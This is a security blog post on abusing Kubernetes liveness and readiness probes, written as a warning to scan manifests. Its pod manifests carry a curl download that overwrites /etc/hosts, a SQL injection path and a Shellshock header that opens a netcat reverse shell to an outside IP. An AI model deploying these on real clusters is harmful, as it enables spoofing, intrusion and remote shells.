Exploiting applications using liveness probes in Kubernetes
Introduction
Startup, readiness, and liveness probes are very well described in the Kubernetes documentation. kubelet uses these probes defined in the pod manifest to verify whether a pod is booting, ready to accept traffic and still alive. It is kubelet who actually executes the probes (and not the pod itself).
There are different ways the probes are executed.
- httpGet
- exec
The problems described here are considered ‘as designed’, as you should download containers from a trusted source according to the reviewers.
The examples below shows that trusted sources of container images will not solve the problem, neither will image scanning.
To prevent an attack from happening, it is mandatory to scan the Kubernetes pod and deployment manifests rigorously before deploying (and not use any pre-canned examples :-))
Example 1: Overwriting files on the pod filesystem
This example overwrites the pods /etc/hostfile to spoof hostnames.
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
labels:
test: liveness
name: liveness-exec15
spec:
containers:
- name: liveness
image: xxradar/hackon
args:
- /bin/sh
- -c
- touch /tmp/healthy;sleep 600
livenessProbe:
exec:
command:
- curl
- www.xxxxx.com/host.txt
- -o
- /etc/hosts
initialDelaySeconds: 5
periodSeconds: 5
EOFExample 2: Installing applications in a pod at deployment time
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
labels:
test: liveness
name: liveness-exec39
spec:
containers:
- name: liveness
image: ubuntu
args:
- /bin/sh
- -c
- touch /tmp/healthy;sleep 600
readinessProbe:
exec:
command:
- apt-get
- update
initialDelaySeconds: 5
periodSeconds: 10
timeoutSeconds: 60
livenessProbe:
exec:
command:
- apt-get
- install
- -y
- curl
initialDelaySeconds: 60
periodSeconds: 100
timeoutSeconds: 60
EOFExample 3: Attacking http(s) endpoints using sql injection, XXS, …
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
labels:
test: liveness
name: liveness3
spec:
containers:
- name: liveness
image: ubuntu
args:
- /bin/sh
- -c
- touch /tmp/healthy;sleep 600
livenessProbe:
httpGet:
host: www.xxxx.com
path: /?'OR 1=1--
port: 8080
httpHeaders:
- name: User-Agent
value: xxxxxxxxx
EOFExample 4 : Attacking http(s) endpoints using shellshock
apiVersion: v1
kind: Pod
metadata:
name: radarhack-pod3
labels:
pod: radarhack
spec:
containers:
- name: radarhack
image: docker.io/xxradar/naxsi5
ports:
- containerPort: 80
livenessProbe:
httpGet:
host: www.xxxxx.com
path: /index.html?test=' or 1=1--
port: 8080
httpHeaders:
- name: Custom-Header
value: Awesome
- name: X-Frame-Options
value: () { :;};echo;/bin/nc -e /bin/bash 1.1.x.x 443
initialDelaySeconds: 3
periodSeconds: 3Conclusion
Many things are written on securely deploying applications on kubernetes. Keep in mind that all aspects need full attention and generating and building Kubernetes manifest is also developping code.
